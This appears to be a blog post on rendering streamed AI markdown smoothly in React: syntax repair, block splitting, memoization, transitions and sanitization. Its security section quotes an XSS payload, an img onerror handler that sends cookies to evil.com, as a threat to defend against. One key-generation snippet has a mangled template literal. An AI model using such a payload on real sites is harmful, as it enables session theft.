How To Build a Performant AI Markdown Renderer

Introduction
Every AI chat app streams markdown to you token by token. ChatGPT, Claude, Gemini, they all do it. Making that render smoothly is harder than it looks. This post breaks down the problem from first principles and walks through how to solve it.
I learned most of this by studying Streamdown, Vercel's open source solution for this exact problem.
Part 1. Understanding the Problem from First Principles
How AI streaming actually works
When an AI generates a response, it does not send the whole thing at once. It sends tokens, small pieces of text, roughly a word or punctuation mark at a time. Your frontend receives them over a stream via SSE, WebSocket, or something like the AI SDK.
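Concretely, the accumulation can be sketched as a plain function, with an array of tokens standing in for the async stream (in a real app they arrive over SSE or a ReadableStream and land in React state):

```typescript
// Each arriving token produces a new, longer content string, which is
// exactly the sequence of props your markdown component renders with.
function renderStates(tokens: string[]): string[] {
  const states: string[] = [];
  let content = "";
  for (const token of tokens) {
    content += token; // setContent(prev => prev + token) in React terms
    states.push(content);
  }
  return states;
}
```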
Here is what your React component sees over time.
```
Render 1:  "#"
Render 2:  "# Hello"
Render 3:  "# Hello\n"
Render 4:  "# Hello\n\nThis"
Render 5:  "# Hello\n\nThis is"
Render 6:  "# Hello\n\nThis is some"
Render 7:  "# Hello\n\nThis is some **bold"
Render 8:  "# Hello\n\nThis is some **bold**"
Render 9:  "# Hello\n\nThis is some **bold** text"
Render 10: "# Hello\n\nThis is some **bold** text\n\n```js"
Render 11: "# Hello\n\nThis is some **bold** text\n\n```js\nconst"
Render 12: "# Hello\n\nThis is some **bold** text\n\n```js\nconst x"
...
Render 50: "# Hello\n\nThis is some **bold** text\n\n```js\nconst x = 1;\n```\n\nMore text..."
```
Your component re-renders on every single token. For a long AI response, that is hundreds of re-renders, each with a growing string.
The naive approach and why it breaks
The obvious thing to do.
```tsx
function ChatMessage({ content }: { content: string }) {
  return <ReactMarkdown>{content}</ReactMarkdown>;
}
```
What happens under the hood on every render.
1. The entire markdown string gets parsed into an AST, an abstract syntax tree.
2. The AST gets transformed through plugins like GFM tables and syntax highlighting.
3. The AST gets converted to React elements.
4. React diffs the entire element tree against the previous render.
5. React applies DOM updates.
At render 5, this is fine. At render 200, when the AI has written 2000 words, you are re-parsing 2000 words of markdown and diffing hundreds of DOM nodes on every token. The page jitters, scrolling stutters, the UI feels sluggish. It's bad.
Why this is specifically an AI streaming problem
A normal markdown renderer like a docs site parses once and renders once. The content is static. There is no performance issue.
The AI streaming case is unique. Content grows with hundreds of updates per response. Each update is tiny but triggers a full re-render. The user is watching in real time, so any jank is visible right away. And conversations get long, with multiple messages of complex markdown.
This is the core insight. The problem is not rendering markdown. It's rendering markdown that is being written in front of you, one token at a time.
Part 2. The Three Problems to Solve
There are exactly three problems. Each has a clean solution. They compose together in a specific order.
Problem 1. Broken markdown mid-stream
Before you even think about performance, you have a correctness problem.
At render 7 above, the component receives this.
```
# Hello

This is some **bold
```
That **bold is incomplete. The closing ** has not arrived yet. A markdown parser treats this as literal text, so the user sees raw **bold instead of bold. Same thing happens with unclosed backticks, links, code fences, math blocks, and strikethrough.
The AI will complete these eventually, but for the few hundred milliseconds while tokens arrive, the user sees broken rendering that snaps into place. It looks terrible.
Solution. Preprocess the raw string before parsing.
Scan the string. Detect incomplete syntax. Auto-close it temporarily for rendering purposes. The original string is never modified, you only fix the copy that goes to the parser.
```
Input:  "Some **bold"
Output: "Some **bold**"

Input:  "Check `this code"
Output: "Check `this code`"

Input:  "```js\nconst x = 1"
Output: "```js\nconst x = 1\n```"
```
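As a sketch of how one of these repairs might look, here is a bold-closing step based on marker counting. This is illustrative only, not remend's implementation: it ignores code-fence context (the trap covered below) and the `***` edge case.

```typescript
// Minimal sketch: close an unclosed ** pair by counting markers.
// An odd number of ** occurrences means the last one is still open.
function closeBold(text: string): string {
  const markers = text.match(/\*\*/g);
  if (markers && markers.length % 2 === 1) {
    return text + "**";
  }
  return text;
}
```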
This is what Streamdown's remend package does. The key insight: this must happen BEFORE markdown parsing, at the raw string level. Once the parser sees incomplete syntax, it has already misinterpreted it.
The context-awareness trap.
You cannot just scan backwards from the end looking for unmatched **. Consider this.
Here is a code block.
```python
x = 2 ** 3 # exponentiation
```
Those ** inside the code fence are Python syntax, not markdown bold. If you close them, you break the code block. Same issue with $ signs inside code blocks (shell variables look like math), backticks inside code blocks, and so on.
So your repair function needs to track whether it is inside a code fence. The minimum viable check.
```ts
function isWithinCodeBlock(text: string, position: number): boolean {
  let inFence = false;
  const lines = text.slice(0, position).split("\n");
  for (const line of lines) {
    if (line.trimStart().startsWith("```")) {
      inFence = !inFence;
    }
  }
  return inFence;
}
```
Walk the text up to the position you are checking, count triple-backtick lines. Odd count means you are inside a fence.
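To sanity-check the fence tracking, here is the same helper with a small probe (the function is repeated so the snippet runs standalone):

```typescript
function isWithinCodeBlock(text: string, position: number): boolean {
  let inFence = false;
  for (const line of text.slice(0, position).split("\n")) {
    if (line.trimStart().startsWith("```")) inFence = !inFence;
  }
  return inFence;
}

const doc = "intro\n```python\nx = 2 ** 3\n```\noutro";
// A position inside the fenced region sees one opening fence line (odd),
// while a position after the closing fence sees two (even).
```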
Priority order for what to repair, highest impact first.
1. Unclosed code fences, because they are the most visually jarring when broken.
2. Unclosed bold and italic markers: `**`, `*`, `__`, `_`.
3. Unclosed inline code with backticks.
4. Unclosed links like `[text](url`.
5. Unclosed math blocks with `$$`.
Handling the first three already eliminates most visual glitches during streaming.
How Streamdown structures this.
Streamdown's remend uses a handler pipeline. Each handler repairs one type of incomplete syntax, runs in priority order, and checks context before acting. It will not close bold markers inside a code fence or backticks inside a math block. Each repair is isolated and testable.
Problem 2. Re-rendering everything on every token
This is the main performance problem. The solution has three parts that work together.
Part A. Split markdown into blocks
Markdown has natural block-level boundaries. Paragraphs separated by blank lines, headings, code fences, lists, blockquotes, tables, horizontal rules.
````
# Hello                ← Block 0, heading

This is a paragraph.   ← Block 1, paragraph

- item one             ← Block 2, list
- item two

```js                  ← Block 3, code
const x = 1;
```

Another paragraph.     ← Block 4, paragraph
````
You can use the `marked` lexer to tokenize markdown into these blocks.
```ts
import { Lexer } from 'marked';

function splitIntoBlocks(markdown: string): string[] {
  const tokens = Lexer.lex(markdown, { gfm: true });
  return tokens.map(token => token.raw);
}
```
That is the core of it. `marked` handles GFM (GitHub Flavored Markdown), which includes tables, task lists, and strikethrough. It returns tokens with a `.raw` property containing the original source text. Each token is one block.
Why marked for splitting but not for rendering. marked has a fast lexer good for tokenization. For rendering to React elements, react-markdown or the unified/remark/rehype pipeline gives you component customization and plugin support. Each tool does what it is best at.
The tradeoff. Two parsers means they could disagree on block boundaries. In practice this is rare since marked is spec-compliant and you only use its lexer. But it does force occasional merge logic. Streamdown merges blocks when an HTML tag spans multiple tokens, or when marked splits a math block because it does not understand LaTeX.
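To make "block boundaries" concrete, here is a deliberately naive splitter on blank lines. It is not what marked's lexer does, and it breaks on fenced code that contains blank lines, which is precisely why the real implementation uses a lexer:

```typescript
// Naive: treat every blank-line gap as a block boundary. Fenced code
// blocks containing blank lines get split incorrectly, so this is only
// an illustration of the idea.
function naiveSplitIntoBlocks(markdown: string): string[] {
  return markdown
    .split(/\n{2,}/)
    .map((block) => block.trim())
    .filter((block) => block.length > 0);
}
```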
Part B. Memoize each block
Each block becomes its own React component wrapped in React.memo.
```tsx
const Block = React.memo(
  ({ content, ...props }: { content: string }) => {
    return <ReactMarkdown {...props}>{content}</ReactMarkdown>;
  },
  (prev, next) => prev.content === next.content,
);
```
Now when a new token arrives, blocks 0 through N-1 have the same content as the last render, so React.memo returns true and skips their re-render entirely. Block N, the one the AI is currently writing, has new content, so React.memo returns false and re-renders just that one block.
Instead of re-parsing 2000 words, you re-parse one paragraph. That is the win.
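You can simulate the effect of the memo comparator with a plain function that diffs two consecutive block arrays and counts how many blocks would actually re-render (a sketch, not Streamdown code):

```typescript
// For each block position, the memo comparator allows a re-render only
// when content differs. During streaming that is typically just the
// last block, or a newly appended one.
function countRerenders(prev: string[], next: string[]): number {
  let rerenders = 0;
  for (let i = 0; i < next.length; i++) {
    if (prev[i] !== next[i]) rerenders++;
  }
  return rerenders;
}
```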
Part C. Use stable, index-based keys
This is a subtle but important React detail. When rendering a list of blocks.
```tsx
{blocks.map((block, index) => (
  <Block key={`block-${index}`} content={block} />
))}
```
Why index-based keys and not content-hash keys.
If you used a content hash as the key like key={hash(block)}, here is what happens when the last block changes from "Some **bo" to "Some **bold". The hash changes, React sees a new key, it unmounts the old Block and mounts a new one. Mounting means creating new DOM nodes, running effects, losing internal state. This is exactly what you do not want. You want React to update the existing Block with new props.
With index-based keys, index 3 existed before and still exists, so React keeps the same component instance. Props changed, so the memo comparator runs, sees new content, and allows a re-render. React updates existing DOM nodes instead of unmounting and remounting.
The general advice against index keys applies when items can be reordered or deleted. Streaming markdown blocks only append or modify the last block. Index keys are correct here.
Problem 3. The rendering pipeline
Once you have clean blocks, each block needs to become React elements. The pipeline is.
```
Markdown string
  → Parse to Markdown AST with remark
  → Transform with remark plugins like GFM and math
  → Convert to HTML AST with remark-rehype
  → Transform with rehype plugins like sanitize and highlight
  → Convert to JSX with hast-util-to-jsx-runtime (react-markdown does this for you)
  → React elements
```
If you are using react-markdown, this pipeline is handled for you.
```tsx
<ReactMarkdown remarkPlugins={[remarkGfm]} rehypePlugins={[rehypeSanitize]}>
  {content}
</ReactMarkdown>
```
Optimization. Cache the processor.
The unified pipeline compiles plugins into a processor. Creating one is expensive. If your plugins do not change between renders (and they should not), cache it.
```ts
const processor = useMemo(
  () =>
    unified()
      .use(remarkParse)
      .use(remarkGfm)
      .use(remarkRehype)
      .use(rehypeSanitize)
      .use(rehypeStringify),
  [],
);
```
Streamdown takes this further with an LRU cache of up to 100 processors keyed by plugin configuration, so multiple component instances with different plugins each get their own cached processor.
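A minimal sketch of that idea, using a Map's insertion order as a cheap LRU. The key format and factory callback here are assumptions for illustration; Streamdown's actual cache is keyed by plugin configuration:

```typescript
const MAX_PROCESSORS = 100;
const processorCache = new Map<string, object>();

// Return a cached processor for this configuration, creating and
// caching it on first use, and evicting the least recently used entry
// once the cache is full.
function getProcessor(configKey: string, create: () => object): object {
  const cached = processorCache.get(configKey);
  if (cached) {
    processorCache.delete(configKey); // re-insert to mark as most recent
    processorCache.set(configKey, cached);
    return cached;
  }
  const processor = create();
  processorCache.set(configKey, processor);
  if (processorCache.size > MAX_PROCESSORS) {
    const oldest = processorCache.keys().next().value as string;
    processorCache.delete(oldest); // oldest = first-inserted entry
  }
  return processor;
}
```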
Part 3. The Complete Data Flow
Here is the full pipeline, end to end, in the order things happen.
```
1. AI sends token via stream
        ↓
2. Your state updates: setContent(prev => prev + token)
        ↓
3. Component re-renders with the new content string
        ↓
4. REPAIR: repairMarkdown(content) fixes incomplete syntax
   "Some **bold" → "Some **bold**"
        ↓
5. SPLIT: splitIntoBlocks(repaired) returns string[]
   ["# Hello", "Some **bold**"]
   Memoized; only recalculates if the string changed.
        ↓
6. TRANSITION: setDisplayBlocks(blocks) wrapped in startTransition
   This makes the update interruptible so React can abandon a stale render.
        ↓
7. RENDER: blocks.map((block, i) => <Block key={i} content={block} />)
   Blocks 0..N-1 have unchanged content, so React.memo skips them: zero work.
   Block N has changed content, so it re-renders: parse one block, update DOM.
        ↓
8. User sees smooth, incremental rendering.
```
Why startTransition matters
When the AI streams fast, you might get 10 tokens in 100ms. Without startTransition, each triggers a synchronous render. React cannot interrupt a synchronous render, so if render 1 takes 30ms, renders stack up and the UI freezes.
With startTransition, block updates are marked as low priority. React starts rendering with token 1. When token 2 arrives mid-render, React abandons that render and starts over. Token 3 arrives, abandons again. When there is a pause in tokens, React finishes the latest render.
The user sees the latest state, not every intermediate state. The UI stays responsive.
```tsx
const [blocks, setBlocks] = useState<string[]>([]);
const [isPending, startTransition] = useTransition();

useEffect(() => {
  const newBlocks = splitIntoBlocks(repairedContent);
  startTransition(() => {
    setBlocks(newBlocks);
  });
}, [repairedContent]);
```
This is a React 18+ feature and one of its best real-world use cases.
Part 4. The Memoization Details
The custom comparator on Block
Streamdown does not use the default React.memo shallow comparison. It uses a custom comparator.
```ts
const Block = memo(Component, (prevProps, nextProps) => {
  // Return true to SKIP re-render, false to ALLOW re-render
  if (prevProps.content !== nextProps.content) return false;
  if (prevProps.index !== nextProps.index) return false;
  // Deep-compare the components object, shallow check each key
  // Reference-compare plugin arrays
  return true;
});
```
Why custom. The default React.memo does Object.is on every prop. If a parent passes a new object reference for components but the actual functions inside are the same, default memo would re-render unnecessarily. The custom comparator checks what actually matters.
The top-level memo is intentionally lossy
The outer Streamdown component has a memo comparator that intentionally ignores several props.
```ts
memo(
  StreamdownInner,
  (prev, next) =>
    prev.children === next.children &&
    prev.isAnimating === next.isAnimating &&
    prev.mode === next.mode &&
    prev.plugins === next.plugins,
  // caret, controls, components, remarkPlugins, rehypePlugins
  // are deliberately NOT checked
);
```
This is a deliberate tradeoff. Those props almost never change during streaming, so checking them is wasted work. If someone changes caret mid-stream, it will not update until children changes on the next token. Speed over correctness for props that are effectively static.
Memoization is not free. Comparing props that never change is pure overhead. Know your hot path and optimize the comparator for it.
useMemo layering
Streamdown chains useMemo calls so each step only recalculates when its specific input changes.
// Layer 1. Only re-run repair when raw content changes
const processed = useMemo(() => repairMarkdown(children), [children]);
// Layer 2. Only re-split when processed content changes
const blocks = useMemo(() => splitIntoBlocks(processed), [processed]);
// Layer 3. Only recompute directions when blocks change
const directions = useMemo(() => blocks.map(detectDirection), [blocks]);
// Layer 4. Only regenerate keys when block COUNT changes, not content
const keys = useMemo(
() => blocks.map((_, i) => `\({id}-\){i}`),
[blocks.length, id],
);
Note the key generation depends on blocks.length, not blocks. The keys only need to change when a new block appears and the length increases, not when an existing block's content updates. Memoize at the narrowest dependency possible.
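The consequence is easy to check with a plain sketch of the key generator, where `id` stands in for a stable value like the one React's useId provides:

```typescript
// Keys depend only on the block count and a stable id, so updating an
// existing block's content never changes any key, and React keeps all
// existing component instances mounted.
function makeKeys(blockCount: number, id: string): string[] {
  return Array.from({ length: blockCount }, (_, i) => `${id}-${i}`);
}
```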
Part 5. Putting It All Together
Here is the complete minimal implementation, roughly 60 lines that handle all three core problems.
```tsx
import { memo, useEffect, useMemo, useState, useTransition } from "react";
import ReactMarkdown from "react-markdown";
import remarkGfm from "remark-gfm";
import { Lexer } from "marked";

// --- Repair ---
function repairMarkdown(text: string): string {
  if (!text) return text;
  let result = text;

  // Close unclosed code fences first, because an open fence changes the
  // context for everything else
  let fenceCount = 0;
  for (const line of result.split("\n")) {
    if (line.trimStart().startsWith("```")) fenceCount++;
  }
  if (fenceCount % 2 === 1) {
    return result + "\n```"; // Inside a code fence, do not repair inline syntax
  }

  // Close unclosed bold
  const boldMatches = result.match(/\*\*/g);
  if (boldMatches && boldMatches.length % 2 === 1) {
    result = result + "**";
  }

  // Close unclosed inline code (single backticks only)
  const backtickMatches = result.match(/(?<!`)`(?!`)/g);
  if (backtickMatches && backtickMatches.length % 2 === 1) {
    result = result + "`";
  }

  return result;
}

// --- Block Splitting ---
function splitIntoBlocks(markdown: string): string[] {
  const tokens = Lexer.lex(markdown, { gfm: true });
  return tokens.map((token) => token.raw);
}

// --- Memoized Block ---
const Block = memo(
  ({ content }: { content: string }) => (
    <ReactMarkdown remarkPlugins={[remarkGfm]}>{content}</ReactMarkdown>
  ),
  (prev, next) => prev.content === next.content,
);

// --- Streaming Component ---
function StreamingMarkdown({ content }: { content: string }) {
  const [displayBlocks, setDisplayBlocks] = useState<string[]>([]);
  const [, startTransition] = useTransition();

  const repaired = useMemo(() => repairMarkdown(content), [content]);
  const blocks = useMemo(() => splitIntoBlocks(repaired), [repaired]);

  useEffect(() => {
    startTransition(() => setDisplayBlocks(blocks));
  }, [blocks]);

  return (
    <div className="space-y-4">
      {displayBlocks.map((block, i) => (
        <Block key={`block-${i}`} content={block} />
      ))}
    </div>
  );
}
```
That handles broken syntax, block-level memoization, and interruptible streaming updates. Everything beyond this — syntax highlighting, math, Mermaid diagrams, RTL detection, animations, the full remend pipeline — is production polish on top of this core.
Part 6. Security
The threat model
AI-generated markdown can contain anything. Users can inject content through their prompts that ends up in the AI response. Consider this.
```html
<img
  src="x"
  onerror="document.location='https://evil.com/?cookie='+document.cookie"
/>
```
If you render raw HTML from markdown without sanitization, you have an XSS (cross-site scripting) vulnerability. An attacker could steal session cookies, redirect users to phishing pages, inject scripts that modify the page, or exfiltrate data.
What sanitize raw HTML means concretely
By default, react-markdown escapes HTML, which is safe but limiting. To render HTML blocks, you use rehype-raw to parse them, then rehype-sanitize to strip dangerous elements and attributes.
```tsx
import rehypeRaw from "rehype-raw";
import rehypeSanitize from "rehype-sanitize";

<ReactMarkdown rehypePlugins={[rehypeRaw, rehypeSanitize]}>
  {content}
</ReactMarkdown>;
```
rehype-sanitize uses an allowlist. Only safe tags (p, a, img, code, pre, table) and safe attributes (href, src, alt, class) pass through. Script tags, onerror handlers, javascript protocol URLs — all stripped.
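To illustrate the allowlist idea (this is not rehype-sanitize's implementation, just a sketch of the principle applied to attributes):

```typescript
// Keep only known-safe attributes; drop event handlers and
// javascript: URLs. Real sanitizers also filter tags, URL protocols
// per attribute, CSS, and more.
const SAFE_ATTRS = new Set(["href", "src", "alt", "class"]);

function sanitizeAttrs(attrs: Record<string, string>): Record<string, string> {
  const clean: Record<string, string> = {};
  for (const [name, value] of Object.entries(attrs)) {
    if (!SAFE_ATTRS.has(name.toLowerCase())) continue; // drops onerror etc.
    if (/^\s*javascript:/i.test(value)) continue; // drops javascript: URLs
    clean[name] = value;
  }
  return clean;
}
```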
Why this matters for AI renderers specifically
A docs site controls its own content. An AI markdown renderer does not. It displays content generated by a model prompted by a user. If an attacker crafts a prompt that makes the AI produce malicious HTML and your renderer blindly renders it, you have a vulnerability. The renderer is a trust boundary between user-influenced AI output and the DOM.
What Streamdown does
Streamdown applies three layers. rehype-raw to parse HTML in markdown into the AST. rehype-sanitize to strip dangerous elements via an allowlist. rehype-harden for link and image safety like URL validation and protocol enforcement.
You do not need all three, but you need at least sanitization. The attack surface exists — address it in your design, not as an afterthought.